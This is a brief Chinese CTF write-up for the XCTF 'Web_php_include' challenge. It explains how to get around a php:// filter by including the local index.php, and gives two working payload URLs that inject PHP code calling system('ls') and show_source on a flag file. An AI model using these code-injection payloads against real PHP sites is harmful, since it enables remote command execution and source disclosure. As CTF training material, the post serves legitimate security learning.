XCTF web Web_php_include (php://过滤)
发布日期:2021-05-07 06:19:21
浏览次数:15
分类:精选文章
本文共 276 字,大约阅读时间需要 1 分钟。
题目代码
用php://来引入文件流,然后include显示文件信息
php://被过滤,但是有个hello
因为这个页面就是默认页面,而且默认页面也可以用index.php来访问可以把page转到当前页面,并且配合hello来执行一条php函数的语句获取信息就可以了。
?page=http://127.0.0.1/index.php/?hello=<?system("ls");?>
?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?> 发表评论
最新留言
关注你微信了!
[***.104.42.241]2025年04月18日 03时26分57秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
C++ 函数重载
2019-03-05
Nginx简介
2019-03-05
Nginx的Gzip功能
2019-03-05
Azure Storage 系列(四)在.Net 上使用Table Storage
2019-03-05
[模板] 带修莫队
2019-03-05
abstract关键字的使用
2019-03-05
算法题:获取一个字符串在另一个字符串中出现的次数
2019-03-05
算法题:获取两个字符串中的最大相同子串
2019-03-05
Asp.Net Core&Jenkins持续交付到Windows Server
2019-03-05
自我总结和学习表单提交的几种方式 (一)
2019-03-05
利用Bootstrap Paginator插件和KnockoutJS完成分页功能
2019-03-05
.NET微信网页开发之使用微信JS-SDK调用微信扫一扫功能
2019-03-05
.NET微信网页开发之使用微信JS-SDK获取当前地理位置
2019-03-05
Android Studio在android Emulator中运行的项目黑屏
2019-03-05
Python写代码的时候为什么要注释?Sun因此被Oracle收购
2019-03-05
JAVA高并发集合详解
2019-03-05
解决Spirng注入时名称下的红色波浪线
2019-03-05
操作系统知识概述
2019-03-05
读懂操作系统(x64)之堆栈帧(过程调用)
2019-03-05
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 457538097 位访客
访问时间: 2025-04-18 09:55:45
访问IP: 3.133.106.206
Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1
手机版